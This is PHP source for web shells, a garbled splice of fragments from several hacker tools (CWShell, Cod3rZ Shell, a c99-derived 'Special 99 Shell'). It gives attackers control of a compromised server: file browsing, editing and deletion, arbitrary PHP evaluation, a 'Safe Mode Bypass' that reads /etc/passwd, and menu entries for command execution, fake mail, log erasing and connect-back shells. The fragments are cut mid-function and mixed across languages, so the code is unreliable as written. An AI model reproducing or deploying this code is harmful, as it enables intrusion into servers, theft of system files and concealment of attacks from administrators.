echo "</b><br>Select action/file-type:<br>";
foreach ($arr as $t) {
if ($t[1] == $rft) {
echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><font color=\"green\">" . $t[0] . "</font></a>";
} elseif ($t[1] == $ft) {
echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><b><u>" . $t[0] . "</u></b></a>";
} else {
echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><b>" . $t[0] . "</b></a>";
}
echo " (<a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&white=1&d=" . urlencode($d) . "\" target=\"_blank\">+</a>) |";
}
echo "<hr size=\"1\" noshade>";
if ($ft == "info") {
echo "<b>Information:</b>";
echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
echo "<tr class=tr><td><b>Size</b></td><td> " . view_size(filesize($d . $f)) . "</td></tr>";
echo "<tr class=tr><td><b>MD5</b></td><td> " . md5_file($d . $f) . "</td></tr>";
if (!$win) {
echo "<tr class=tr><td><b>Owner/Group</b></td><td> ";
$tmp = posix_getpwuid(fileowner($d . $f));
if (!isset($tmp['name']) || $tmp['name'] == "") {
echo fileowner($d . $f) . " ";
} else {
echo $tmp['name'] . " ";
}
$tmp = posix_getgrgid(filegroup($d . $f));
if (!isset($tmp['name']) || $tmp['name'] == "") {
echo filegroup($d . $f);
} else {
echo $tmp['name'];
}
echo "</b><br>" . ws(2);
echo "ÇáÏæÇá ÇáããäæÚÉ : <b>";
if ('' == ($df = @ini_get('disable_functions'))) {
echo "<font color=#00800F>áÇíæÌÏ</font></b>";
} else {
echo "<font color=red>{$df}</font></b>";
}
$free = @diskfreespace($dir);
if (!$free) {
$free = 0;
}
$all = @disk_total_space($dir);
if (!$all) {
$all = 0;
}
echo "<br>" . ws(2) . "ÇáãÓÇÍÉ ÇáÎÇáíå : <b>" . view_size($free) . "</b> ÇáãÓÇÍÉ ÇáßáíÉ: <b>" . view_size($all) . "</b>";
echo '</font></td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9>
<tr><td align=right width=100>';
echo $font;
if ($unix) {
echo '<font color=#CCCCCC><b>uname -a :' . ws(1) . '<br>sysctl :' . ws(1) . '<br>$OSTYPE :' . ws(1) . '<br>Server :' . ws(1) . '<br>id :' . ws(1) . '<br>pwd :' . ws(1) . '</b></font><br>';
echo "</td><td>";
echo "<font face=tahoma size=-2 color=#2279D9><b>";
echo !empty($uname) ? ws(3) . @substr($uname, 0, 120) . "<br>" : ws(3) . @substr(@php_uname(), 0, 120) . "<br>";
echo ws(3) . $sysctl . "<br>";
echo ws(3) . ex('echo $OSTYPE') . "<br>";
echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>";
if (!empty($id)) {
echo ws(3) . $id . "<br>";
} else {
echo "</b><br>" . ws(2);
echo "Disable functions : <b>";
if ('' == ($df = @ini_get('disable_functions'))) {
echo "<font color=green>NONE</font></b>";
} else {
echo "<font color=red>{$df}</font></b>";
}
$free = @diskfreespace($dir);
if (!$free) {
$free = 0;
}
$all = @disk_total_space($dir);
if (!$all) {
$all = 0;
}
echo "<br>" . ws(2) . "Free space : <b>" . view_size($free) . "</b> Total space: <b>" . view_size($all) . "</b>";
echo '</font></td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td align=right width=100>';
echo $font;
if ($unix) {
echo '<font color=blue><b>uname -a :' . ws(1) . '<br>sysctl :' . ws(1) . '<br>$OSTYPE :' . ws(1) . '<br>Server :' . ws(1) . '<br>id :' . ws(1) . '<br>pwd :' . ws(1) . '</b></font><br>';
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
echo !empty($uname) ? ws(3) . @substr($uname, 0, 120) . "<br>" : ws(3) . @substr(@php_uname(), 0, 120) . "<br>";
echo ws(3) . $sysctl . "<br>";
echo ws(3) . ex('echo $OSTYPE') . "<br>";
echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>";
if (!empty($id)) {
echo ws(3) . $id . "<br>";
} else {
}
$arr = array(array("[hex]", "info"), array("[html]", "html"), array("[txt]", "txt"), array("[Code]", "code"), array("[Session]", "phpsess"), array("[exe]", "exe"), array("[SDB]", "sdb"), array("[gif]", "img"), array("[ini]", "ini"), array("[download]", "download"), array("[rtf]", "notepad"), array("[change]", "edit"));
echo "<b>Viewing file: [{$ext}] " . $f . " (" . view_size(filesize($d . $f)) . ") " . view_perms_color($d . $f) . "</b><br>Select action/file-type:<br>";
foreach ($arr as $t) {
if ($t[1] == $rft) {
echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><font color=green>" . $t[0] . "</font></a>";
} elseif ($t[1] == $ft) {
echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><b><u>" . $t[0] . "</u></b></a>";
} else {
echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><b>" . $t[0] . "</b></a>";
}
echo " (<a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&white=1&d=" . urlencode($d) . "\" target=\"_blank\">+</a>) |";
}
echo "<hr size=\"1\" noshade>";
if ($ft == "info") {
echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> " . $d . $f . "</td></tr><tr><td><b>Size</b></td><td> " . view_size(filesize($d . $f)) . "</td></tr><tr><td><b>MD5</b></td><td> " . md5_file($d . $f) . "</td></tr>";
if (!$win) {
echo "<tr><td><b>Owner/Group</b></td><td> ";
$ow = posix_getpwuid(fileowner($d . $f));
$gr = posix_getgrgid(filegroup($d . $f));
echo ($ow["name"] ? $ow["name"] : fileowner($d . $f)) . "/" . ($gr["name"] ? $gr["name"] : filegroup($d . $f));
}
echo "<tr><td><b>Perms</b></td><td><a href=\"" . $surl . "act=chmod&f=" . urlencode($f) . "&d=" . urlencode($d) . "\">" . view_perms_color($d . $f) . "</a></td></tr><tr><td><b>Create time</b></td><td> " . date("d/m/Y H:i:s", filectime($d . $f)) . "</td></tr><tr><td><b>Access time</b></td><td> " . date("d/m/Y H:i:s", fileatime($d . $f)) . "</td></tr><tr><td><b>MODIFY time</b></td><td> " . date("d/m/Y H:i:s", filemtime($d . $f)) . "</td></tr></table><br>";
$fi = fopen($d . $f, "rb");
if ($fi) {
if ($fullhexdump) {
echo "<b>FULL HEXDUMP</b>";
$str = fread($fi, filesize($d . $f));
} else {
echo "<b>HEXDUMP PREVIEW</b>";
$str = fread($fi, $hexdump_lines * $hexdump_rows);
$filew++;
$listz = "/" . $list;
if (eregi($page, $listz)) {
@($listf .= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana color=yellow>' . $list . '<td valign=top><font size=2 face=Verdana>' . $typezz . '</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx . ' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>');
} elseif (eregi('config', $listz) && eregi('.php', $listz)) {
@($listf .= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana><b>' . $list . '</b><td valign=top><font size=2 face=Verdana>' . $typezz . '</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx . ' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>');
} else {
@($listf .= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana>' . $list . '<td valign=top><font size=2 face=Verdana>' . $typezz . '</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx . ' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>');
}
}
}
closedir($open);
}
$fileq = $pahtw + $filew;
}
echo "<html>\n<head><title>{$site} ~ CWShéLL - Edited By KingDefacer</title>\n<style>\ntable.menu {\nborder-width: 0px;\n border-spacing: 1px;\n border-style: solid;\n border-color: #a6a6a6;\n border-collapse: separate;\n background-color: rgb(98, 97,97);\n}\ntable.menuz {\nborder-width: 0px;\n border-spacing: 1px;\n border-style: solid;\n border-color: #a6a6a6;\n border-collapse: separate;\n background-color: rgb(98, 97,97);\n}\ntable.menu td {\n border-width: 1px;\n padding: 1px;\n border-style: none;\n border-color: #333333;\n background-color: #000000;\n -moz-border-radius: 0px;\n}\ntable.menuz tr {\n border-width: 1px;\n padding: 1px;\n border-style: none;\n border-color: #333333;\n background-color: #000000;\n -moz-border-radius: 0px;\n}\n\ntable.menuz tr:hover {\n\tbackground-color: #111111;\n}\ninput,textarea,select {\nfont: normal 11px Verdana, Arial, Helvetica, sans-serif;\nbackground-color:black;\ncolor:#a6a6a6;\nborder: solid 1px #363636;\n}\n</style>\n</head>\n<body bgcolor='#000000' text='#ebebeb' link='#ebebeb' alink='#ebebeb' vlink='#ebebeb'>\n<table style='background-color:#333333; border-color:#a6a6a6' width=100% border=0 align=center cellpadding=0 cellspacing=0>\n<tr><td>\n<center><b><font size='6' face='Webdings'>ü</font>\n<font face='Verdana' size='5'><a href='" . @$_SERVER['HTTP_REFERER'] . "'>~ CWShell ~</font></a>\n<font size='6' face='Webdings'>ü</font></b>\n</center>\n</td></tr></table><table class=menu width=100%<tr><td>\n<font size='1' face='Verdana'><b>Site: </b><u>{$site}</u> <br>\n<b>Server Name: </b><u>" . $_SERVER['SERVER_NAME'] . "</u> <br>\n<b>Server Bilgisi : </b> <u>{$info}</u> <br>\n<b>Uname -a:</b> <u>{$uname}</u> <br>\n<b>Klasör:</b> <u>" . $_SERVER['DOCUMENT_ROOT'] . "</u> <br>\n<b>Safe Mode:</b> <u>{$safemode}</u> <br>\n<b>Sihirli Sozler:</b> <u>{$quot}</u> <br>\n<b>Sayfa:</b> <u>{$page}</u><br>\n<b>Boþ Alan:</b> <u>" . view_size($free) . " [ {$percentfree}% ]</u> <br>\n<b>Toplam Alan:</b> <u>" . view_size($all) . "</u> <br>\n<b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] . "</u> - Server IP:</b> <a href='http://whois.domaintools.com/" . $_SERVER['SERVER_ADDR'] . "'>" . $_SERVER['SERVER_ADDR'] . "</a></td></tr>\n<tr><td><form method='post' action=''>\n<center><input type=submit value='File List' name=filelist> - <input type=submit value='View PhpInfo' name=phpinfo> - <input type=submit value='Encoder' name='encoder'> - <input type='submit' value='Send Fake Mail' name='mail'> - <input type='submit' value='Cmd Execution' name='commex'> - <input type='submit' name='logeraser' value='Logs Eraser'> - <input type='submit' name='connectback' value='Connect Back'> - <input type='submit' name='safemodz' value='Safe Mode Bypass'> - <input type='submit' name='milw0' value='Milw0rm Search'></center></td></tr>";
// Safe Mode Bypass
if (isset($_POST['safemodz'])) {
echo "<tr><td valign=top width=50%>\n<center><b><font size='2' face='Verdana'>Safe-Mode Bypass[Dosyalar]<br></font></b>\n<form action='' method='post'>\n <font size='1' face='Verdana'>Dosya adý:</font><br> <input type='text' name='filew' value='/etc/passwd'> <input type='submit' value='Dosyayý Oku' name='redfi'><br>\n\t </td><tr>\n<td valign=top>\n<center><b><font size='2' face='Verdana'>Safe-Mode Bypass [Klasörler]<br></font></b>\n <form method='post' action=''>\n <font size='1' face='Verdana'>Klasör:</font><br>\n <input type='text' name='directory'> <input type='submit' value='Listele' name='reddi'>";
}
// Safe Mode Bypass: File
if (isset($_POST['redfi'])) {
$test = '';
$tempp = tempnam($test, "cx");
$get = htmlspecialchars($_POST['filew']);
if (copy("compress.zlib://" . $get, $tempp)) {
$fopenzo = fopen($tempp, "r");
$freadz = fread($fopenzo, filesize($tempp));
fclose($fopenzo);
$source = htmlspecialchars($freadz);
echo "<tr><td><center><font size='1' face='Verdana'>{$get}</font><br><textarea rows='20' cols='80' name='source'>{$source}</textarea>";
//UP Directory
if (basename($dir[$i]) === "..") {
$tmp = explode('/', getcwd());
$new = "";
for ($j = 0; $j < count($tmp) - 1; $j++) {
$new .= $tmp[$j] . "/";
}
print "<tr><td><a href=\"" . $patch . "?dir=" . $new . "\">UP</a></td></tr>\n";
}
print "</tr>\n";
$perms_unix = get_perms($dir[$i], 1);
$perms_num = get_perms($dir[$i], 2);
//è un FILE
if (is_file($dir[$i])) {
if (basename($dir[$i]) != '..') {
print "<tr><td><a href=\"" . $patch . "?view_file=" . $dir[$i] . "\">" . $dir[$i] . "</a></td>\n" . "<td>" . view_size(@filesize($dir[$i])) . "</td>\n" . "<td><u><a href=\"?action=chmod&file=" . $dir[$i] . "&perms=" . $perms_num . "\">" . $perms_unix . " - " . $perms_num . "</a></u></td>\n" . "<td><a href=\"" . $patch . "?edit_file=" . $dir[$i] . "\">Edit</a> - \n \t\t\t <a href=\"" . $patch . "?remove_file=" . $dir[$i] . "\">Del</a> - \n \t\t\t <a href=\"" . $patch . "?download_file=" . $dir[$i] . "\">Down</a> - \n \t\t\t <a href=\"" . $patch . "?hexdump_file=" . $dir[$i] . "\">HEXDUMP</a></td>\n" . "</tr>\n";
}
}
//è una CARTELLA
if (is_dir($dir[$i])) {
if (basename($dir[$i]) != '..') {
print "<tr><td><a href=\"" . $patch . "?dir=" . $dir[$i] . "\">[ " . $dir[$i] . " ]</td>\n" . "<td>DIR</td>\n" . "<td><u><a href=\"?action=chmod&file=" . $dir[$i] . "&perms=" . $perms_num . "\">" . $perms_unix . " - " . $perms_num . "</a></u></td>\n" . "<td><a href=\"" . $patch . "?rmdir=" . $dir[$i] . "\">Del</a>\n" . "</tr>\n";
}
}
}
print "\n</table>";
?>
<br />
<table>
<tr>
<td valign='top'>
function disp_freespace($curdrv)
{
$free = disk_free_space($curdrv);
$total = disk_total_space($curdrv);
if ($free === FALSE) {
$free = 0;
}
if ($total === FALSE) {
$total = 0;
}
if ($free < 0) {
$free = 0;
}
if ($total < 0) {
$total = 0;
}
$used = $total - $free;
$free_percent = round(100 / ($total / $free), 2) . "%";
$free = view_size($free);
$total = view_size($total);
return "{$free} of {$total} ({$free_percent})";
}
if (!is_readable(FILECONFIG) or is_dir(FILECONFIG) || !is_readable(FILEACCOUNT) or is_dir(FILEACCOUNT)) {
foreach ($settingfile as $file) {
if (file_exists($file)) {
$buffer_TEXT .= "<b>Permision denied (" . htmlspecialchars($file) . ")!</b>";
} else {
$buffer_TEXT .= '<b>' . $file . ' does not exists.</b><br />';
}
}
unset($file);
} else {
$close_config_page = false;
$styledisplay = ' style="display:none;"';
$showpostn = false;
$iserr = false;
foreach ($settingfile as $file) {
$buffer_TEXT .= "<b>File: " . basename($file) . " (" . view_size(filesize($file)) . ") attrib: " . view_perms_color($file) . "</b><br />";
}
unset($file);
$buffer_TEXT .= "You're logged with IP: <b class='g'>" . $visitors->userip . "</b><br /><hr width='800%' />";
if (isset($_POST['submit']) && $_POST['setupsave'] == 1) {
#============= WRITE CONFIG ================
# Final filter to write config
# Filter level 2; check strict value; raise error if value not valid
if ($task == 'editor') {
$edt = $_POST['edit_text'];
$sfile = $_POST['file'];
if (!write_file($sfile, $edt, 1)) {
$buffer_TEXT .= "<b class='a'>Can't write to file!</b>";
} else {
$buffer_TEXT .= "<b style='color:#00FF33'>Saved!</b>";
// $r = $edt;
if (@($dh = opendir(chr($j) . ":/"))) {
$content .= '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . chr($j) . ':/\'; document.reqs.submit();"> ' . chr($j) . '<a/>';
}
}
$content .= "</td></tr>";
}
$content .= "<tr><td>Name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
for ($i = 0; $i < count($dire); $i++) {
$link = $dir . $dire[$i];
$content .= '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . $link . '\'; document.reqs.submit();">' . $dire[$i] . '<a/></td>
<td>dir</td><td></td><td>' . perms($link) . '</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>';
}
for ($i = 0; $i < count($files); $i++) {
$linkfile = $dir . $files[$i];
$content .= '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.file.value=\'' . $linkfile . '\'; document.reqs.submit();">' . $files[$i] . '</a><br></td>
<td>file</td><td>' . view_size(filesize($linkfile)) . '</td><td>' . perms($linkfile) . '</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Download">D</a>
<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>';
}
$content .= "</table>";
}
}
}
//downloader
if ($action == 'download') {
header('Content-Length:' . filesize($file) . '');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $file . '"');
readfile($file);
}
//phpeval
if ($action == 'phpeval') {
function scandire($dir)
{
if (empty($dir)) {
$dir = getcwd();
}
$dir = chdir($dir) or die('<font color="red">cannot chdir!</font> open_basedir/safe_mode on?<br><br>' . $pageend . '');
$dir = getcwd() . "/";
$dir = str_replace("\\", "/", $dir);
if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if (filetype($dir . $file) == "dir") {
$dire[] = $file;
}
if (filetype($dir . $file) == "file" || filetype($dir . $file) == "link" || filetype($dir . $file) == "socket") {
$files[] = $file;
}
// if(filetype($dir.$file)=="") $files[]=$file; //debug: strange behavior of filetype() with openbasedir, it returns ""
// if(filetype($dir.$file)=="link") $files[]=$file;
// echo "file = ".$file." (".filetype($file).")<br>"; #debug
// if (is_link($file)) { echo " -> ".readlink($file); }; #debug
}
closedir($dh);
@sort($dire);
@sort($files);
echo "<table border>";
echo '<tr><td><form method="post" action="' . $_SERVER['PHP_SELF'] . '"><input name="p" type="hidden" value="f">go to dir:<input type="text" name="dir" value="' . $dir . '" size="30"><input name="action" type="hidden" value="viewer"><input type="submit" value="Go"></form></td></tr>';
echo "<tr><td>Name</td><td>Type</td><td>Size</td><td>Inode Changed<br>File Modified<br>File Accessed</td><td>Owner<br>Group</td><td>Chmod</td><td>Action</td></tr>";
for ($i = 0; $i < count($dire); $i++) {
$link = $dir . $dire[$i];
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . $link . '\'; document.reqs.submit();">' . $dire[$i] . '<a/></td><td>Dir</td><td>' . view_size(dirsize($link)) . '</td><td><font size="-1">' . date("d/m/Y H:i:s", filectime($link)) . '<br>' . date("d/m/Y H:i:s", filemtime($link)) . '<br>' . date("d/m/Y H:i:s", fileatime($link)) . '</font></td><td>' . owner($link) . '</td><td>' . substr(sprintf('%o', fileperms($link)), -4) . ' <br>(' . view_perms_color($link, "string") . ')</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.dir.value=\'' . $dir . '\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Delete">x</a> <a href="#" onclick="document.reqs.action.value=\'chmod\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Chmod">C</a> <a href="#" onclick="document.reqs.action.value=\'touch\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Touch">T</a></td></tr>';
}
for ($i = 0; $i < count($files); $i++) {
$linkfile = $dir . $files[$i];
echo '<tr><td><a href="#" onclick="document.editor.filee.value=\'' . $linkfile . '\'; document.editor.files.value=\'' . $linkfile . '\'; document.editor.submit();">' . $files[$i] . '</a>';
echo '<br></td><td>File</td><td>' . view_size(filesize($linkfile)) . '</td><td><font size="-1">' . date("d/m/Y H:i:s", filectime($linkfile)) . '<br>' . date("d/m/Y H:i:s", filemtime($linkfile)) . '<br>' . date("d/m/Y H:i:s", fileatime($linkfile)) . '</font></td><td>' . owner($linkfile) . '</td><td>' . substr(sprintf('%o', fileperms($linkfile)), -4) . ' <br>(' . view_perms_color($linkfile, "string") . ')</td><td> <a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\'' . $linkfile . '\'; document.reqs.submit();" title="Download">D</a> <a href="#" onclick="document.editor.filee.value=\'' . $linkfile . '\'; document.editor.files.value=\'' . $linkfile . '\'; document.editor.submit();" title="Edit">E</a> <a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Delete">x</a> <a href="#" onclick="document.reqs.action.value=\'chmod\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Chmod">C</a> <a href="#" onclick="document.reqs.action.value=\'touch\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Touch">T</a></td></tr></tr>';
}
echo "</table>";
}
}
}
<tr><td>
<center><b><font size='6' face='Webdings'>!</font>
<font face='Verdana' size='5'><a href='".$_SERVER['HTTP_REFERER']."'>~ Cod3rZ Shell ~</font></a>
<font size='6' face='Webdings'>!</font></b>
</center>
</td></tr></table><table class=menu width=100%<tr><td>
<font size='1' face='Verdana'><b>Site: </b><u>$site</u> <br>
<b>Server Name: </b><u>" . $_SERVER['SERVER_NAME'] . "</u> <br>
<b>Software:</b> <u>$info</u> <br>
<b>Uname -a:</b> <u>$uname</u> <br>
<b>Path:</b> <u>" . $_SERVER['DOCUMENT_ROOT'] . "</u> <br>
<b>Safe Mode:</b> <u>$safemode</u> <br>
<b>Magic Quotes:</b> <u>$quot</u> <br>
<b>Page:</b> <u>$page</u><br>
<b>Free Space:</b> <u>" . view_size($free) . " [ $percentfree% ]</u> <br>
<b>Total Space:</b> <u>" . view_size($all) . "</u> <br>
<b>Your IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='http://whois.domaintools.com/". $_SERVER['SERVER_ADDR'] ."'>".$_SERVER['SERVER_ADDR']."</a></td></tr>
<tr><td><form method='post' action=''>
<center><input type=submit value='File List' name=filelist> - <input type=submit value='View PhpInfo' name=phpinfo> - <input type=submit value='Encoder' name='encoder'> - <input type='submit' value='Send Fake Mail' name='mail'> - <input type='submit' name='logeraser' value='Logs Eraser'> - <input type='submit' name='connectback' value='Connect Back'> - <input type='submit' name='safemodz' value='Safe Mode Bypass'> - <input type='submit' name='milw0' value='Milw0rm Search'></form></center></td></tr>";
// Safe Mode Bypass
if(isset($_POST['safemodz']))
{
echo "<tr><td valign=top width=50%>
<center><b><font size='2' face='Verdana'>:: Safe-Mode Bypass [Files] ::<br></font></b>
<form action='' method='post'>
<font size='1' face='Verdana'>File Name:</font><br> <input type='text' name='filew' value='/etc/passwd'> <input type='submit' value='Read File' name='redfi'></font><br>
</td><tr>
<td valign=top>
<center><b><font size='2' face='Verdana'>:: Safe-Mode Bypass [Directories] ::<br></font></b>
<form method='post' action=''>
<b>Fayla Get</b>
</font>
<form action="<?php
echo $surl;
?>
"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php
echo $dispd;
?>
"><input type="text" name="f" size="50" value="<?php
echo $dispd;
?>
"><font face="Tahoma"> </font><input type=submit value="Get"></form></center></td></tr></table>
</td>
</tr>
</TABLE>
<br><TABLE width="100%" height=1 border=1 cellPadding=0 cellSpacing=0 borderColorLight=#c0c0c0 borderColorDark=#666666 bgColor=#330000 style="BORDER-COLLAPSE: collapse">
<tr><td width="990" height="1" valign="top">
<font face="Tahoma">
<?php
echo "\n<table border='0' width='100%' cellspacing='0' cellpadding='0'>\n\t<tr>\n\t\t<td><li><font face='Tahoma' size='1' color='#FF0000'>Həcm</font></li></td>\n\t\t<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>\n\t\t<td><font face='Tahoma' size='1' color='#00FF00'>" . view_size($total) . "</font></td>\n\t\t<td><li><font face='Tahoma' size='1' color='#FF0000'>Sizin Ip'niz</font></li></td>\n\t\t<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>\n\t\t<td><a href=http://" . $_SERVER['REMOTE_ADDR'] . "\n\t\t<font face='Tahoma' size='1' color='#00FF00'>" . $_SERVER['REMOTE_ADDR'] . "</font></td>\n\t</tr>\n\t<tr>\n\t\t<td><li><font face='Tahoma' size='1' color='#FF0000'>Bos Həcm</font></li></td>\n\t\t<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>\n\t\t<td><font face='Tahoma' size='1' color='#00FF00'>" . view_size($free) . "</font></td>\n\t\t<td><li><font face='Tahoma' size='1' color='#FF0000'>Server</font></li></td>\n\t\t<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>\n\t\t<td><a href=http://" . gethostbyname($_SERVER['HTTP_HOST']) . "\n\t\t<font face='Tahoma' size='1' color='#00FF00'>" . gethostbyname($_SERVER['HTTP_HOST']) . "</font></td>\n\t</tr>\n\t<tr>\n\t\t<td><li><font face='Tahoma' size='1' color='#FF0000'>Bos Faiz</font></li></td>\n\t\t<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>\n\t\t<td><font face='Tahoma' size='1' color='#00FF00'>%" . $free_percent . "</font></td>\n\t\t<td><li><font face='Tahoma' size='1' color='#FF0000'>Dəstək Server</font></li></td>\n\t\t<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>\n\t\t<td><a href={$dsunucu}\n\t\t<td><font face='Tahoma' size='1' color='#00FF00'>http://www.caspian-pirates.org</font></td>\n\t</tr>\n</table>\n";
?>
</font><hr><p align='center'><font face='Tahoma' size='1'>[ Special 99 Shell
v1.0 || Developing by </font>
<font face='Tahoma' size='2'> <font color='white'><a href='http://caspian-pirates.org'>
<font face="Tahoma"><b>ฬaђเtє_ฬ๏lŦ</b></font></a></font> </font><font face='Tahoma' size='1'>
|| <a href='http://www.Caspian-Pirates.OrG'>
<font face="Tahoma">Caspian-Pirates.OrG</font></a> ]</font></p>
</td></tr></table>+
<br/></body></html><?php
chdir($lastdir);
c99shexit();
$content .= "<tr><td>Select drive:";
for ($j = ord('C'); $j <= ord('Z'); $j++) {
if (@($dh = opendir(chr($j) . ":/"))) {
$content .= '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . chr($j) . ':/\'; document.reqs.submit();"> ' . chr($j) . '<a/>';
}
}
$content .= "</td></tr>";
}
$content .= "<tr><td>Name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
for ($i = 0; $i < count($dire); $i++) {
$link = $dir . $dire[$i];
$content .= '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . $link . '\'; document.reqs.submit();">' . $dire[$i] . '<a/></td><td>dir</td><td></td><td>' . perms($link) . '</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>';
}
for ($i = 0; $i < count($files); $i++) {
$linkfile = $dir . $files[$i];
$content .= '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.file.value=\'' . $linkfile . '\'; document.reqs.submit();">' . $files[$i] . '</a><br></td><td>file</td><td>' . view_size(filesize($linkfile)) . '</td><td>' . perms($linkfile) . '</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Download">D</a><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>';
}
$content .= "</table>";
}
}
}
//downloader
if ($action == "download") {
header('Content-Length:' . filesize($file) . '');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $file . '"');
readfile($file);
}
//phpeval
if ($action == "phpeval") {
$content .= "<form method=\"POST\">\n <input type=\"hidden\" name=\"action\" value=\"phpeval\">\n <input type=\"hidden\" name=\"dir\" value=\"" . $dir . "\">\n <?php<br>\n <textarea name=\"phpev\" rows=\"5\" cols=\"150\">" . @$_POST['phpev'] . "</textarea><br>\n ?><br>\n <input type=\"submit\" value=\"execute\"></form>";
function scandire($dir)
{
$dir = chdir($dir);
$dir = getcwd() . "/";
$dir = str_replace("\\", "/", $dir);
if (is_dir($dir)) {
if (@($dh = opendir($dir))) {
while (($file = readdir($dh)) !== false) {
if (filetype($dir . $file) == "dir") {
$dire[] = $file;
}
if (filetype($dir . $file) == "file") {
$files[] = $file;
}
}
closedir($dh);
@sort($dire);
@sort($files);
echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"" . $dir . "\" size=50><input type=submit value=\"GO\"></form></td></tr>";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
echo "<tr><td>Select drive:";
for ($j = ord('C'); $j <= ord('Z'); $j++) {
if (@($dh = opendir(chr($j) . ":/"))) {
